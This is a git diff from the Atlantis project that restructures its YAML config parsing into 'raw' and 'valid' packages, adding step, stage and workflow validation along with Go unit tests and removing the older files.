--- /dev/null
+++ b/server/events/yaml/raw/stage.go
@@ -0,0 +1,26 @@
+package raw
+
+import (
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type Stage struct {
+	Steps []Step `yaml:"steps,omitempty"`
+}
+
+func (s Stage) Validate() error {
+	return validation.ValidateStruct(&s,
+		validation.Field(&s.Steps),
+	)
+}
+
+func (s Stage) ToValid() valid.Stage {
+	var validSteps []valid.Step
+	for _, s := range s.Steps {
+		validSteps = append(validSteps, s.ToValid())
+	}
+	return valid.Stage{
+		Steps: validSteps,
+	}
+}
diff --git a/server/events/yaml/raw/stage_test.go b/server/events/yaml/raw/stage_test.go
new file mode 100644
index 0000000000..245ed2c4f3
--- /dev/null
+++ b/server/events/yaml/raw/stage_test.go
@@ -0,0 +1,103 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestStage_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Stage
+	}{
+		{
+			description: "empty",
+			input:       "",
+			exp: raw.Stage{
+				Steps: nil,
+			},
+		},
+		{
+			description: "all fields set",
+			input: `
+steps: [step1]
+`,
+			exp: raw.Stage{
+				Steps: []raw.Step{
+					{
+						Key: String("step1"),
+					},
+				},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var a raw.Stage
+			err := yaml.UnmarshalStrict([]byte(c.input), &a)
+			Ok(t, err)
+			Equals(t, c.exp, a)
+		})
+	}
+}
+
+func TestStage_Validate(t *testing.T) {
+	// Should validate each step.
+	s := raw.Stage{
+		Steps: []raw.Step{
+			{
+				Key: String("invalid"),
+			},
+		},
+	}
+	validation.ErrorTag = "yaml"
+	ErrEquals(t, "steps: (0: \"invalid\" is not a valid step type.).", s.Validate())
+
+	// Empty steps should validate.
+	Ok(t, (raw.Stage{}).Validate())
+}
+
+func TestStage_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Stage
+		exp         valid.Stage
+	}{
+		{
+			description: "nothing set",
+			input:       raw.Stage{},
+			exp: valid.Stage{
+				Steps: nil,
+			},
+		},
+		{
+			description: "fields set",
+			input: raw.Stage{
+				Steps: []raw.Step{
+					{
+						Key: String("init"),
+					},
+				},
+			},
+			exp: valid.Stage{
+				Steps: []valid.Step{
+					{
+						StepName: "init",
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go
new file mode 100644
index 0000000000..b414f4607f
--- /dev/null
+++ b/server/events/yaml/raw/step.go
@@ -0,0 +1,195 @@
+package raw
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+
+	"github.com/flynn-archive/go-shlex"
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+	ExtraArgsKey  = "extra_args"
+	RunStepName   = "run"
+	PlanStepName  = "plan"
+	ApplyStepName = "apply"
+	InitStepName  = "init"
+)
+
+// Step represents a single action/command to perform. In YAML, it can be set as
+// 1. A single string for a built-in command:
+//    - init
+//    - plan
+// 2. A map for a built-in command and extra_args:
+//    - plan:
+//        extra_args: [-var-file=staging.tfvars]
+// 3. A map for a custom run command:
+//    - run: my custom command
+// Here we parse step in the most generic fashion possible. See fields for more
+// details.
+type Step struct {
+	// Key will be set in case #1 and #3 above to the key. In case #2, there
+	// could be multiple keys (since the element is a map) so we don't set Key.
+	Key *string
+	// Map will be set in case #2 above.
+	Map map[string]map[string][]string
+	// StringVal will be set in case #3 above.
+	StringVal map[string]string
+}
+
+func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// First try to unmarshal as a single string, ex.
+	// steps:
+	// - init
+	// - plan
+	// We validate if it's a legal string later.
+	var singleString string
+	err := unmarshal(&singleString)
+	if err == nil {
+		s.Key = &singleString
+		return nil
+	}
+
+	// This represents a step with extra_args, ex:
+	//   init:
+	//     extra_args: [a, b]
+	// We validate if there's a single key in the map and if the value is a
+	// legal value later.
+	var step map[string]map[string][]string
+	err = unmarshal(&step)
+	if err == nil {
+		s.Map = step
+		return nil
+	}
+
+	// Try to unmarshal as a custom run step, ex.
+	// steps:
+	// - run: my command
+	// We validate if the key is run later.
+	var runStep map[string]string
+	err = unmarshal(&runStep)
+	if err == nil {
+		s.StringVal = runStep
+		return nil
+	}
+
+	return err
+}
+
+func (s Step) Validate() error {
+	validStep := func(value interface{}) error {
+		str := *value.(*string)
+		if str != InitStepName && str != PlanStepName && str != ApplyStepName {
+			return fmt.Errorf("%q is not a valid step type", str)
+		}
+		return nil
+	}
+
+	extraArgs := func(value interface{}) error {
+		elem := value.(map[string]map[string][]string)
+		var keys []string
+		for k := range elem {
+			keys = append(keys, k)
+		}
+
+		if len(keys) > 1 {
+			return fmt.Errorf("step element can only contain a single key, found %d: %s",
+				len(keys), strings.Join(keys, ","))
+		}
+		for stepName, args := range elem {
+			if stepName != InitStepName && stepName != PlanStepName && stepName != ApplyStepName {
+				return fmt.Errorf("%q is not a valid step type", stepName)
+			}
+			var argKeys []string
+			for k := range args {
+				argKeys = append(argKeys, k)
+			}
+
+			// args should contain a single 'extra_args' key.
+			if len(argKeys) > 1 {
+				return fmt.Errorf("built-in steps only support a single %s key, found %d: %s",
+					ExtraArgsKey, len(argKeys), strings.Join(argKeys, ","))
+			}
+			for k := range args {
+				if k != ExtraArgsKey {
+					return fmt.Errorf("built-in steps only support a single %s key, found %q in step %s", ExtraArgsKey, k, stepName)
+				}
+			}
+		}
+		return nil
+	}
+
+	runStep := func(value interface{}) error {
+		elem := value.(map[string]string)
+		var keys []string
+		for k := range elem {
+			keys = append(keys, k)
+		}
+
+		if len(keys) > 1 {
+			return fmt.Errorf("step element can only contain a single key, found %d: %s",
+				len(keys), strings.Join(keys, ","))
+		}
+		for stepName, args := range elem {
+			if stepName != RunStepName {
+				return fmt.Errorf("%q is not a valid step type", stepName)
+			}
+			_, err := shlex.Split(args)
+			if err != nil {
+				return fmt.Errorf("unable to parse as shell command: %s", err)
+			}
+		}
+		return nil
+	}
+
+	if s.Key != nil {
+		return validation.Validate(s.Key, validation.By(validStep))
+	}
+	if len(s.Map) > 0 {
+		return validation.Validate(s.Map, validation.By(extraArgs))
+	}
+	if len(s.StringVal) > 0 {
+		return validation.Validate(s.StringVal, validation.By(runStep))
+	}
+	return errors.New("step element is empty")
+}
+
+func (s Step) ToValid() valid.Step {
+	// This will trigger in case #1 (see Step docs).
+	if s.Key != nil {
+		return valid.Step{
+			StepName: *s.Key,
+		}
+	}
+
+	// This will trigger in case #2 (see Step docs).
+	if len(s.Map) > 0 {
+		// After validation we assume there's only one key and it's a valid
+		// step name so we just use the first one.
+		for stepName, stepArgs := range s.Map {
+			return valid.Step{
+				StepName:  stepName,
+				ExtraArgs: stepArgs[ExtraArgsKey],
+			}
+		}
+	}
+
+	// This will trigger in case #3 (see Step docs).
+	if len(s.StringVal) > 0 {
+		// After validation we assume there's only one key and it's a valid
+		// step name so we just use the first one.
+		for _, v := range s.StringVal {
+			// We ignore the error here because it should have been checked in
+			// Validate().
+			split, _ := shlex.Split(v) // nolint: errcheck
+			return valid.Step{
+				StepName:   RunStepName,
+				RunCommand: split,
+			}
+		}
+	}
+
+	panic("step was not valid. This is a bug!")
+}
diff --git a/server/events/yaml/raw/step_test.go b/server/events/yaml/raw/step_test.go
new file mode 100644
index 0000000000..ec8a5d4934
--- /dev/null
+++ b/server/events/yaml/raw/step_test.go
@@ -0,0 +1,387 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestStepConfig_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Step
+		expErr      string
+	}{
+
+		// Single string.
+		{
+			description: "single string",
+			input:       `astring`,
+			exp: raw.Step{
+				Key: String("astring"),
+			},
+		},
+
+		// MapType i.e. extra_args style.
+		{
+			description: "extra_args style",
+			input: `
+key:
+  mapValue: [arg1, arg2]`,
+			exp: raw.Step{
+				Map: MapType{
+					"key": {
+						"mapValue": {"arg1", "arg2"},
+					},
+				},
+			},
+		},
+		{
+			description: "extra_args style multiple keys",
+			input: `
+key:
+  mapValue: [arg1, arg2]
+  value2: []`,
+			exp: raw.Step{
+				Map: MapType{
+					"key": {
+						"mapValue": {"arg1", "arg2"},
+						"value2":   {},
+					},
+				},
+			},
+		},
+		{
+			description: "extra_args style multiple top-level keys",
+			input: `
+key:
+  val1: []
+key2:
+  val2: []`,
+			exp: raw.Step{
+				Map: MapType{
+					"key": {
+						"val1": {},
+					},
+					"key2": {
+						"val2": {},
+					},
+				},
+			},
+		},
+
+		// Run-step style
+		{
+			description: "run step",
+			input: `
+run: my command`,
+			exp: raw.Step{
+				StringVal: map[string]string{
+					"run": "my command",
+				},
+			},
+		},
+		{
+			description: "run step multiple top-level keys",
+			input: `
+run: my command
+key: value`,
+			exp: raw.Step{
+				StringVal: map[string]string{
+					"run": "my command",
+					"key": "value",
+				},
+			},
+		},
+
+		// Empty
+		{
+			description: "empty",
+			input:       "",
+			exp: raw.Step{
+				Key:       nil,
+				Map:       nil,
+				StringVal: nil,
+			},
+		},
+
+		// Errors
+		{
+			description: "extra args style no slice strings",
+			input: `
+key:
+  value:
+    another: map`,
+			expErr: "yaml: unmarshal errors:\n  line 3: cannot unmarshal !!map into string",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var got raw.Step
+			err := yaml.UnmarshalStrict([]byte(c.input), &got)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, got)
+		})
+	}
+}
+
+func TestStep_Validate(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Step
+		expErr      string
+	}{
+		// Valid inputs.
+		{
+			description: "init step",
+			input: raw.Step{
+				Key: String("init"),
+			},
+			expErr: "",
+		},
+		{
+			description: "plan step",
+			input: raw.Step{
+				Key: String("plan"),
+			},
+			expErr: "",
+		},
+		{
+			description: "apply step",
+			input: raw.Step{
+				Key: String("apply"),
+			},
+			expErr: "",
+		},
+		{
+			description: "init extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"init": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			expErr: "",
+		},
+		{
+			description: "plan extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"plan": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			expErr: "",
+		},
+		{
+			description: "apply extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"apply": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			expErr: "",
+		},
+		{
+			description: "run step",
+			input: raw.Step{
+				StringVal: map[string]string{
+					"run": "my command",
+				},
+			},
+			expErr: "",
+		},
+
+		// Invalid inputs.
+		{
+			description: "empty elem",
+			input:       raw.Step{},
+			expErr:      "step element is empty",
+		},
+		{
+			description: "invalid step name",
+			input: raw.Step{
+				Key: String("invalid"),
+			},
+			expErr: "\"invalid\" is not a valid step type",
+		},
+		{
+			description: "multiple keys in map",
+			input: raw.Step{
+				Map: MapType{
+					"key1": nil,
+					"key2": nil,
+				},
+			},
+			expErr: "step element can only contain a single key, found 2: key1,key2",
+		},
+		{
+			description: "multiple keys in string val",
+			input: raw.Step{
+				StringVal: map[string]string{
+					"key1": "",
+					"key2": "",
+				},
+			},
+			expErr: "step element can only contain a single key, found 2: key1,key2",
+		},
+		{
+			description: "invalid key in map",
+			input: raw.Step{
+				Map: MapType{
+					"invalid": nil,
+				},
+			},
+			expErr: "\"invalid\" is not a valid step type",
+		},
+		{
+			description: "invalid key in string val",
+			input: raw.Step{
+				StringVal: map[string]string{
+					"invalid": "",
+				},
+			},
+			expErr: "\"invalid\" is not a valid step type",
+		},
+		{
+			description: "non extra_arg key",
+			input: raw.Step{
+				Map: MapType{
+					"init": {
+						"invalid": nil,
+					},
+				},
+			},
+			expErr: "built-in steps only support a single extra_args key, found \"invalid\" in step init",
+		},
+		{
+			description: "unparseable shell command",
+			input: raw.Step{
+				StringVal: map[string]string{
+					"run": "my 'c",
+				},
+			},
+			expErr: "unable to parse as shell command: EOF found when expecting closing quote.",
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := c.input.Validate()
+			if c.expErr == "" {
+				Ok(t, err)
+				return
+			}
+			ErrEquals(t, c.expErr, err)
+		})
+	}
+}
+
+func TestStep_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Step
+		exp         valid.Step
+	}{
+		{
+			description: "init step",
+			input: raw.Step{
+				Key: String("init"),
+			},
+			exp: valid.Step{
+				StepName: "init",
+			},
+		},
+		{
+			description: "plan step",
+			input: raw.Step{
+				Key: String("plan"),
+			},
+			exp: valid.Step{
+				StepName: "plan",
+			},
+		},
+		{
+			description: "apply step",
+			input: raw.Step{
+				Key: String("apply"),
+			},
+			exp: valid.Step{
+				StepName: "apply",
+			},
+		},
+		{
+			description: "init extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"init": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			exp: valid.Step{
+				StepName:  "init",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+		{
+			description: "plan extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"plan": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			exp: valid.Step{
+				StepName:  "plan",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+		{
+			description: "apply extra_args",
+			input: raw.Step{
+				Map: MapType{
+					"apply": {
+						"extra_args": []string{"arg1", "arg2"},
+					},
+				},
+			},
+			exp: valid.Step{
+				StepName:  "apply",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+		{
+			description: "run step",
+			input: raw.Step{
+				StringVal: map[string]string{
+					"run": "my 'run command'",
+				},
+			},
+			exp: valid.Step{
+				StepName:   "run",
+				RunCommand: []string{"my", "run command"},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
+
+type MapType map[string]map[string][]string
diff --git a/server/events/yaml/raw/workflow.go b/server/events/yaml/raw/workflow.go
new file mode 100644
index 0000000000..1a6dc73245
--- /dev/null
+++ b/server/events/yaml/raw/workflow.go
@@ -0,0 +1,31 @@
+package raw
+
+import (
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type Workflow struct {
+	Apply *Stage `yaml:"apply,omitempty"`
+	Plan  *Stage `yaml:"plan,omitempty"`
+}
+
+func (w Workflow) Validate() error {
+	return validation.ValidateStruct(&w,
+		validation.Field(&w.Apply),
+		validation.Field(&w.Plan),
+	)
+}
+
+func (w Workflow) ToValid() valid.Workflow {
+	var v valid.Workflow
+	if w.Apply != nil {
+		apply := w.Apply.ToValid()
+		v.Apply = &apply
+	}
+	if w.Plan != nil {
+		plan := w.Plan.ToValid()
+		v.Plan = &plan
+	}
+	return v
+}
diff --git a/server/events/yaml/raw/workflow_test.go b/server/events/yaml/raw/workflow_test.go
new file mode 100644
index 0000000000..85320cfaad
--- /dev/null
+++ b/server/events/yaml/raw/workflow_test.go
@@ -0,0 +1,168 @@
+package raw_test
+
+import (
+	"testing"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+	"gopkg.in/yaml.v2"
+)
+
+func TestWorkflow_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         raw.Workflow
+		expErr      string
+	}{
+		{
+			description: "empty",
+			input:       ``,
+			exp: raw.Workflow{
+				Apply: nil,
+				Plan:  nil,
+			},
+		},
+		{
+			description: "yaml null",
+			input:       `~`,
+			exp: raw.Workflow{
+				Apply: nil,
+				Plan:  nil,
+			},
+		},
+		{
+			description: "only plan/apply set",
+			input: `
+plan:
+apply:
+`,
+			exp: raw.Workflow{
+				Apply: nil,
+				Plan:  nil,
+			},
+		},
+		{
+			description: "steps set to null",
+			input: `
+plan:
+  steps: ~
+apply:
+  steps: ~`,
+			exp: raw.Workflow{
+				Plan: &raw.Stage{
+					Steps: nil,
+				},
+				Apply: &raw.Stage{
+					Steps: nil,
+				},
+			},
+		},
+		{
+			description: "steps set to empty slice",
+			input: `
+plan:
+  steps: []
+apply:
+  steps: []`,
+			exp: raw.Workflow{
+				Plan: &raw.Stage{
+					Steps: []raw.Step{},
+				},
+				Apply: &raw.Stage{
+					Steps: []raw.Step{},
+				},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var w raw.Workflow
+			err := yaml.UnmarshalStrict([]byte(c.input), &w)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, w)
+		})
+	}
+}
+
+func TestWorkflow_Validate(t *testing.T) {
+	// Should call the validate of Stage.
+	w := raw.Workflow{
+		Apply: &raw.Stage{
+			Steps: []raw.Step{
+				{
+					Key: String("invalid"),
+				},
+			},
+		},
+	}
+	validation.ErrorTag = "yaml"
+	ErrEquals(t, "apply: (steps: (0: \"invalid\" is not a valid step type.).).", w.Validate())
+
+	// Unset keys should validate.
+	Ok(t, (raw.Workflow{}).Validate())
+}
+
+func TestWorkflow_ToValid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       raw.Workflow
+		exp         valid.Workflow
+	}{
+		{
+			description: "nothing set",
+			input:       raw.Workflow{},
+			exp: valid.Workflow{
+				Apply: nil,
+				Plan:  nil,
+			},
+		},
+		{
+			description: "fields set",
+			input: raw.Workflow{
+				Apply: &raw.Stage{
+					Steps: []raw.Step{
+						{
+							Key: String("init"),
+						},
+					},
+				},
+				Plan: &raw.Stage{
+					Steps: []raw.Step{
+						{
+							Key: String("init"),
+						},
+					},
+				},
+			},
+			exp: valid.Workflow{
+				Apply: &valid.Stage{
+					Steps: []valid.Step{
+						{
+							StepName: "init",
+						},
+					},
+				},
+				Plan: &valid.Stage{
+					Steps: []valid.Step{
+						{
+							StepName: "init",
+						},
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			Equals(t, c.exp, c.input.ToValid())
+		})
+	}
+}
diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go
deleted file mode 100644
index 874877f766..0000000000
--- a/server/events/yaml/spec.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package yaml
-
-type Spec struct {
-	Version   *int                `yaml:"version,omitempty"`
-	Projects  []Project           `yaml:"projects,omitempty"`
-	Workflows map[string]Workflow `yaml:"workflows,omitempty"`
-}
diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go
deleted file mode 100644
index 6106e22a27..0000000000
--- a/server/events/yaml/spec_test.go
+++ /dev/null
@@ -1,152 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestConfig_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Spec
-		expErr      string
-	}{
-		{
-			description: "no data",
-			input:       "",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "yaml nil",
-			input:       "~",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "invalid key",
-			input:       "invalid: key",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-			expErr: "yaml: unmarshal errors:\n  line 1: field invalid not found in struct yaml.Spec",
-		},
-		{
-			description: "version set",
-			input:       "version: 2",
-			exp: yaml.Spec{
-				Version:   Int(2),
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "projects key without value",
-			input:       "projects:",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "workflows key without value",
-			input:       "workflows:",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "projects with a map",
-			input:       "projects:\n  key: value",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-			expErr: "yaml: unmarshal errors:\n  line 2: cannot unmarshal !!map into []yaml.Project",
-		},
-		{
-			description: "projects with a scalar",
-			input:       "projects: value",
-			exp: yaml.Spec{
-				Version:   nil,
-				Projects:  nil,
-				Workflows: nil,
-			},
-			expErr: "yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `value` into []yaml.Project",
-		},
-		{
-			description: "should use values if set",
-			input: `
-version: 2
-projects:
-- dir: mydir
-  workspace: myworkspace
-  workflow: default
-  terraform_version: v0.11.0
-  auto_plan:
-    enabled: false
-    when_modified: []
-  apply_requirements: [mergeable]
-workflows:
-  default:
-    plan:
-      steps: []
-    apply:
-     steps: []`,
-			exp: yaml.Spec{
-				Version: Int(2),
-				Projects: []yaml.Project{
-					{
-						Dir:              String("mydir"),
-						Workspace:        String("myworkspace"),
-						Workflow:         String("default"),
-						TerraformVersion: String("v0.11.0"),
-						AutoPlan: &yaml.AutoPlan{
-							WhenModified: []string{},
-							Enabled:      Bool(false),
-						},
-						ApplyRequirements: []string{"mergeable"},
-					},
-				},
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Apply: &yaml.Stage{
-							Steps: []yaml.Step{},
-						},
-						Plan: &yaml.Stage{
-							Steps: []yaml.Step{},
-						},
-					},
-				},
-			},
-		},
-	}
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var conf yaml.Spec
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &conf)
-			if c.expErr != "" {
-				ErrEquals(t, c.expErr, err)
-				return
-			}
-			Ok(t, err)
-			Equals(t, c.exp, conf)
-		})
-	}
-}
diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go
deleted file mode 100644
index be342403f6..0000000000
--- a/server/events/yaml/stage.go
+++ /dev/null
@@ -1,5 +0,0 @@
-package yaml
-
-type Stage struct {
-	Steps []Step `yaml:"steps,omitempty"`
-}
diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go
deleted file mode 100644
index ffcebe1a5a..0000000000
--- a/server/events/yaml/stage_test.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestStage_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Stage
-	}{
-		{
-			description: "empty",
-			input:       "",
-			exp: yaml.Stage{
-				Steps: nil,
-			},
-		},
-		{
-			description: "all fields set",
-			input: `
-steps: [step1]
-`,
-			exp: yaml.Stage{
-				Steps: []yaml.Step{
-					{
-						Key: String("step1"),
-					},
-				},
-			},
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var a yaml.Stage
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &a)
-			Ok(t, err)
-			Equals(t, c.exp, a)
-		})
-	}
-}
diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go
deleted file mode 100644
index f8c09d9bc0..0000000000
--- a/server/events/yaml/step.go
+++ /dev/null
@@ -1,61 +0,0 @@
-package yaml
-
-// Step represents a single action/command to perform. In YAML, it can be set as
-// 1. A single string for a built-in command:
-//    - init
-//    - plan
-// 2. A map for a built-in command and extra_args:
-//    - plan:
-//        extra_args: [-var-file=staging.tfvars]
-// 3. A map for a custom run command:
-//    - run: my custom command
-// Here we parse step in the most generic fashion possible. See fields for more
-// details.
-type Step struct {
-	// Key will be set in case #1 and #3 above to the key. In case #2, there
-	// could be multiple keys (since the element is a map) so we don't set Key.
-	Key *string
-	// Map will be set in case #2 above.
-	Map map[string]map[string][]string
-	// StringVal will be set in case #3 above.
-	StringVal map[string]string
-}
-
-func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// First try to unmarshal as a single string, ex.
-	// steps:
-	// - init
-	// - plan
-	// We validate if it's a legal string later.
-	var singleString string
-	err := unmarshal(&singleString)
-	if err == nil {
-		s.Key = &singleString
-		return nil
-	}
-
-	// This represents a step with extra_args, ex:
-	//   init:
-	//     extra_args: [a, b]
-	// We validate if there's a single key in the map and if the value is a
-	// legal value later.
-	var step map[string]map[string][]string
-	err = unmarshal(&step)
-	if err == nil {
-		s.Map = step
-		return nil
-	}
-
-	// Try to unmarshal as a custom run step, ex.
-	// steps:
-	// - run: my command
-	// We validate if the key is run later.
-	var runStep map[string]string
-	err = unmarshal(&runStep)
-	if err == nil {
-		s.StringVal = runStep
-		return nil
-	}
-
-	return err
-}
diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go
deleted file mode 100644
index 4bdb6f33ec..0000000000
--- a/server/events/yaml/step_test.go
+++ /dev/null
@@ -1,134 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestStepConfig_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Step
-		expErr      string
-	}{
-
-		// Single string.
-		{
-			description: "single string",
-			input:       `astring`,
-			exp: yaml.Step{
-				Key: String("astring"),
-			},
-		},
-
-		// map[string]map[string][]string i.e. extra_args style.
-		{
-			description: "extra_args style",
-			input: `
-key:
-  mapValue: [arg1, arg2]`,
-			exp: yaml.Step{
-				Map: map[string]map[string][]string{
-					"key": {
-						"mapValue": {"arg1", "arg2"},
-					},
-				},
-			},
-		},
-		{
-			description: "extra_args style multiple keys",
-			input: `
-key:
-  mapValue: [arg1, arg2]
-  value2: []`,
-			exp: yaml.Step{
-				Map: map[string]map[string][]string{
-					"key": {
-						"mapValue": {"arg1", "arg2"},
-						"value2":   {},
-					},
-				},
-			},
-		},
-		{
-			description: "extra_args style multiple top-level keys",
-			input: `
-key:
-  val1: []
-key2:
-  val2: []`,
-			exp: yaml.Step{
-				Map: map[string]map[string][]string{
-					"key": {
-						"val1": {},
-					},
-					"key2": {
-						"val2": {},
-					},
-				},
-			},
-		},
-
-		// Run-step style
-		{
-			description: "run step",
-			input: `
-run: my command`,
-			exp: yaml.Step{
-				StringVal: map[string]string{
-					"run": "my command",
-				},
-			},
-		},
-		{
-			description: "run step multiple top-level keys",
-			input: `
-run: my command
-key: value`,
-			exp: yaml.Step{
-				StringVal: map[string]string{
-					"run": "my command",
-					"key": "value",
-				},
-			},
-		},
-
-		// Empty
-		{
-			description: "empty",
-			input:       "",
-			exp: yaml.Step{
-				Key:       nil,
-				Map:       nil,
-				StringVal: nil,
-			},
-		},
-
-		// Errors
-		{
-			description: "extra args style no slice strings",
-			input: `
-key:
-  value:
-    another: map`,
-			expErr: "yaml: unmarshal errors:\n  line 3: cannot unmarshal !!map into string",
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var got yaml.Step
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &got)
-			if c.expErr != "" {
-				ErrEquals(t, c.expErr, err)
-				return
-			}
-			Ok(t, err)
-			Equals(t, c.exp, got)
-		})
-	}
-}
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
new file mode 100644
index 0000000000..75d79a3d93
--- /dev/null
+++ b/server/events/yaml/valid/valid.go
@@ -0,0 +1,41 @@
+package valid
+
+// Spec is the atlantis yaml spec after it's been parsed and validated.
+// The raw.Spec is transformed into the ValidSpec which is then used by the
+// rest of Atlantis.
+type Spec struct {
+	// Version is the version of the atlantis YAML file. Will always be equal
+	// to 2.
+	Version   int
+	Projects  []Project
+	Workflows map[string]Workflow
+}
+
+type Project struct {
+	Dir               string
+	Workspace         string
+	Workflow          *string
+	TerraformVersion  *string
+	Autoplan          Autoplan
+	ApplyRequirements []string
+}
+
+type Autoplan struct {
+	WhenModified []string
+	Enabled      bool
+}
+
+type Stage struct {
+	Steps []Step
+}
+
+type Step struct {
+	StepName   string
+	ExtraArgs  []string
+	RunCommand []string
+}
+
+type Workflow struct {
+	Apply *Stage
+	Plan  *Stage
+}
diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go
deleted file mode 100644
index 0dd069c648..0000000000
--- a/server/events/yaml/workflow.go
+++ /dev/null
@@ -1,6 +0,0 @@
-package yaml
-
-type Workflow struct {
-	Apply *Stage `yaml:"apply,omitempty"`
-	Plan  *Stage `yaml:"plan,omitempty"`
-}
